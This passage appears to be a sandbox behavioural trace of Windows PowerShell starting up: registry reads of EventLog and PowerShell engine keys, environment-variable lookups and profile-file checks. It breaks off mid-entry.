Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aDU0VK IWA5kLS	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	3	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aDU0VK IWA5kLS	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key